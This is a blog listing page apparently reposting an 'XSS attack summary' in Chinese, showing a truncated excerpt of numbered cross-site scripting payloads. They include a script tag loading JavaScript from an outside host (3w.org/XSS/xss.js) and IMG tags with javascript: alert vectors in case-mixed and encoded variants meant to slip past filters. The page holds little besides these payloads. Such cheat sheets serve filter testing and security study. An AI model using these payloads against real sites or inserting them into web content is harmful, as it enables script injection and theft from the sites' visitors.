Nicholas_F の 领域
Let's Go
2012年10月20日
XSS攻击汇总(转)
摘要: (1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javascript:alert(‘XSS’)>(4)IMG标签大小写不敏感<IMG SRC=JaVaScRiPt:alert(‘XSS’)>(5)HTML编码(必须有分号)<IMG SRC=jav 阅读全文
posted @ 2012-10-20 09:02 Nicholas_F 阅读(7853) 评论(0) 推荐(0) 编辑

Copyright © 2024 Nicholas_F
Powered by .NET 8.0 on Kubernetes Powered By博客园